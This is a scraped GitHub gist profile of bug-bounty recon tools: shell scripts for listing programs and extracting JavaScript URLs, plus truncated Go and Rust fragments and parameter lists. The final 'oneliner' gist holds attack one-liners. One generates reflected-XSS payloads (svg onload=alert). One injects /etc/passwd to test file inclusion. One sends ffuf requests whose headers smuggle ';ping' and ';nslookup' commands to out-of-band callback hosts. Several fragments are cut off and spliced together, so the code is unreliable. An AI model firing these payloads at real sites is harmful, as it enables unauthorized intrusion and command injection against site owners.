Eno Leriand 0x3n0

@0x3n0
0x3n0 / battry
Last active December 27, 2023 13:48
#!/bin/bash
battery_status=$(acpi | awk '{print $3}')
battery_percentage=$(acpi | awk '{print $4}' | sed 's/,//')
if [ "$battery_status" == "Discharging," ]; then
icon="🔋"
else
icon="🔌"
# enable mouse support (pane selection, resizing and scrolling with the mouse)
set -g mouse on

# unbind default prefix and set it to ctrl-a
unbind C-b
set -g prefix C-a
# pressing ctrl-a twice passes a literal ctrl-a through to the program in the pane
bind C-a send-prefix

# make delay shorter: do not wait after Escape to see whether it starts a key sequence
set -sg escape-time 0

Dorks with Go

package main

import (
	"fmt"
	"log"
	"net/http"
	"net/http/cookiejar"
	"os"
@0x3n0
0x3n0 / recon.sh
Last active February 6, 2023 11:12
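#!/usr/bin/env zsh
# Rebuild ~/recon from scratch: download the public Chaos bug-bounty program
# list and create one sub-directory per program name.
#
# WARNING: any existing ~/recon tree is deleted on every run.

recon_dir="$HOME/recon"

# Options first and `--` before the operand, so the path is never parsed as a flag.
rm -rf -- "$recon_dir"
mkdir -p -- "$recon_dir"
# Stop if the directory cannot be entered; otherwise the download and every
# mkdir below would land in whatever directory the script was started from.
cd -- "$recon_dir" || exit 1

# -f: treat an HTTP error as a failure instead of saving the error page as the list.
curl -fO "https://raw.githubusercontent.com/projectdiscovery/public-bugbounty-programs/master/chaos-bugbounty-list.json" || exit 1

# Program names come from a remote file and are used as path components, so
# they are untrusted input: a name containing "/" or equal to ".." would
# otherwise create directories outside ~/recon.
jq -r '.programs[].name' chaos-bugbounty-list.json | while IFS= read -r folder; do
    # Flatten path separators so every program maps to exactly one directory.
    folder=${folder//\//_}
    case "$folder" in
        ''|.|..) continue ;;
    esac
    # `--` keeps a name that starts with "-" from being read as an option.
    mkdir -p -- "$folder"
done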
@0x3n0
0x3n0 / JS_File.sh
Last active February 6, 2023 05:45
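# Print the URLs and paths referenced by the JavaScript files that the page at $1 loads.
#   1. fetch the page and collect its src=...js references as https:// URLs
#   2. fetch each script and extract quoted URLs/paths, including the first
#      argument of .get/.post/.ajax/.load calls
#   3. print the unique results
#
# The script URLs are scraped from remote content and are therefore untrusted.
# They are passed to curl as a quoted argument inside a read loop instead of
# being spliced into an `sh -c` string, so shell metacharacters in a scraped
# URL are never interpreted on the machine running this script.
#
# NOTE(review): -k disables TLS certificate verification for both fetches, so
# the results can be tampered with in transit; drop it where certificates are valid.
curl -L -k -s "$1" | tac | sed "s#\\\/#\/#g" | grep -Eo "src['\"]?\s*[=:]\s*['\"]?[^'\"]+.js[^'\"> ]*" | awk -F '//' '{if(length($2))print "https://"$2}' | sort -fu |
while IFS= read -r js_url; do
    # stdin comes from /dev/null so nothing inside the loop can consume the URL list.
    curl -k -s "$js_url" </dev/null | sed "s/[;}\)>]/\n/g" | grep -Po "(['\"](https?:)?[/]{1,2}[^'\"> ]{5,})|(\.(get|post|ajax|load)\s*\(\s*['\"](https?:)?[/]{1,2}[^'\"> ]{5,})"
done | awk -F "['\"]" '{print $2}' | sort -fu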
# using linkfinder
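# ejs URL
# Download every script referenced by URL's HTML into the current directory
# and run linkfinder.py on each downloaded file.
#
# Relative references are resolved against URL, protocol-relative ones
# (//host/...) are given the https: scheme, absolute ones are used as-is.
#
# The script URLs are scraped from remote content and are therefore untrusted.
# They are handled as quoted arguments in a read loop rather than substituted
# into `sh -c` strings, so shell metacharacters in a scraped URL or file name
# are never interpreted on the machine running this function.
#
# NOTE(review): -k and --no-check-certificate disable TLS verification, so the
# downloaded files can be tampered with in transit; remove them where
# certificates are valid.
function ejs() {
    URL=$1;
    curl -Lks "$URL" | tac | sed "s#\\\/#\/#g" | grep -Eo "src['\"]?\s*[=:]\s*['\"]?[^'\"]+.js[^'\"> ]*" | sed -r "s/^src['\"]?[=:]['\"]//g" | awk -v url="$URL" '{if(length($1)) if($1 ~/^http/) print $1; else if($1 ~/^\/\//) print "https:"$1; else print url"/"$1}' | sort -fu |
    while IFS= read -r js_url; do
        printf '\n##### %s\n' "$js_url"
        # stdin comes from /dev/null so neither tool can consume the URL list.
        wget --no-check-certificate --quiet "$js_url" </dev/null
        # wget saved the file under the URL's last path component.
        linkfinder.py -o cli -i "$(basename -- "$js_url")" </dev/null
    done
}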
# with file download (the new best one):
# but there is a bug if you don't provide a root url

Subs

package main

import (
    "fmt"
    "net/http"
    "io/ioutil"
    "encoding/json"
    "os"
use std::io::{self, BufRead, Read, Write};
use std::net::TcpStream;
use std::str;

fn extract_urls(body: &str) -> Vec<&str> {
    let mut urls = vec![];

    for line in body.lines() {
        if let Some(start) = line.find("src=") {
{
"XSS": [
"q=",
"s=",
"search=",
"lang=",
"keyword=",
"query=",
"page=",
"keywords=",
{
"flags": "-HnriE",
"patterns": [
"Access-Control-Allow-Origin: *",
"Access-Control-Allow-Methods: *",
"Access-Control-Allow-Headers: *",
"Access-Control-Allow-Credentials: true",
"Access-Control-Expose-Headers: *",
"Access-Control-Max-Age: *"
]
@0x3n0
0x3n0 / oneliner
Last active January 21, 2023 10:10
# Reflected-XSS candidate generator. Lists hosts with assetfinder, expands them
# to known URLs with gau, drops lines matching .css/.svg, fetches each page and
# turns every `var NAME` identifier found in it into <url>?NAME=1"><svg onload=alert(1)>.
# The candidates are only printed (URL in yellow, candidates in green); this
# line does not request them.
# "exmple.com" looks like a placeholder for an in-scope target.
# NOTE(review): $url is unquoted in the curl call and `read` lacks -r, so URLs
# containing spaces, globs or backslashes are mangled before they are fetched.
# Detection: one GET per archived URL from a single client in quick succession.
assetfinder https://exmple.com | gau --subs | egrep -v '(.css|.svg)' | while read url; do vars=$(curl -s $url | grep -Eo "var [a-zA-Z0-9]+" | sed -e 's,'var','"$url"?',g' -e 's/ //g' | grep -v '.js' | sed 's/.*/&=1"><svg onload=alert(1)>/g'); echo -e "\e[1;33m$url\n\e[1;32m$vars";done
# Local-file-inclusion check. gf keeps URLs matching its "lfi" pattern set,
# `place` presumably swaps "/etc/passwd" into the parameter values (helper not
# shown here, confirm), then 25 parallel curl calls flag any response that
# contains "root:x".
# NOTE(review): each URL is substituted for % inside the `sh -c` string, so shell
# metacharacters in an archived URL are interpreted on the operator's machine;
# the URLs are third-party data and should be passed as a positional argument.
# Detection: query parameters carrying /etc/passwd, arriving in parallel bursts.
assetfinder https://exmple.com | gau --subs https://exmple.com | gf lfi | place "/etc/passwd" | xargs -I% -P 25 sh -c 'curl -s "%" 2>&1 | grep -q "root:x" && echo "VULN! %"'
# ffuf run over LFI-shaped URLs with FUZZ taken from ~/wordlist.txt, matching
# "root:x" in the response. The Host, Referer and X-Forwarded-Host headers carry
# out-of-band callback names plus `;ping` / `;nslookup` suffixes, so a back end
# that passes those headers to a shell would trigger a DNS lookup.
# NOTE(review): $(hostname) expands to the local machine's hostname, which is
# then disclosed to whoever runs the callback domains; confirm who controls
# burpcollab.net and the oast.online name before sending anything to them.
# Detection: header values containing `;ping` or `;nslookup`, or a Host header
# that does not match any served site.
gf lfi output/domains.txt | place FUZZ | while read url ; do ffuf -u $url -mr "root:x" -H "Host: $(hostname).burpcollab.net" -H "Referer: 8.8.8.8;ping -c 3 $(hostname).burpcollab.net" -H "X-Forwarded-Host: 8.8.8.8;nslookup+callesvmkd63gvfclgjg63ktieresg7dt.oast.online" -H "User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML,like Gecko) Chrome/101.0.4951.64 Safari/537.36" -w ~/wordlist.txt -fc 405 -mc 200,403 -ac true; done
### DNS rebinding for RCE
gf lfi output/*.txt | place FUZZ | while read url ; do ffuf -u $url -mr "root:x" -H